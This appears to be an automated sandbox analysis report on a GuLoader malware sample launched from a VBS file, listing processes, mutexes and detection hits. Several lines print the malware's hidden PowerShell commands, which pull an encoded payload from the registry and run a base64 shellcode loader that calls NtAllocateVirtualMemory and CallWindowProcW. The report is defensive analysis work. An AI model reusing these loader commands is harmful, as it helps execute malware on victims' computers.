Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4544:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2624:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4544:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2624:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{9bd83597-93e4-4366-8889-6a4efb8a5fe8}
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\IMG 0045434.vbs"
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll Jump to behavior
Source: Binary string: caspol.pdbx source: CasPol.exe, 00000010.00000003.266576966136.00000000208A2000.00000004.00000800.00020000.00000000.sdmp, dslmon.exe, 00000014.00000002.266736797377.0000000000B62000.00000002.00000001.01000000.00000007.sdmp, dslmon.exe, 0000001A.00000002.266898010453.0000000000BF2000.00000002.00000001.01000000.00000007.sdmp, dslmon.exe.16.dr
Source: Binary string: caspol.pdb source: dslmon.exe, dslmon.exe, 0000001A.00000002.266898010453.0000000000BF2000.00000002.00000001.01000000.00000007.sdmp, dslmon.exe.16.dr

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000010.00000000.266464354998.0000000001300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.268221853538.0000000000F00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.268214047867.0000000000E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAG
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAG
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAG
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAG
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_081ECA74 push eax; mov dword ptr [esp], ecx 10_2_081ECA9C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_082301B8 push eax; mov dword ptr [esp], edx 10_2_082301CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08235399 pushfd ; retf 10_2_0823539F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08230440 push eax; mov dword ptr [esp], edx 10_2_0823053C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08231500 push cs; ret 10_2_08231517
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088D1D67 push edx; iretd 10_2_088D1D6B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_089BE4DE push esp; ret 10_2_089BE4E1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0815C99F push ss; ret 19_2_0815C9B9
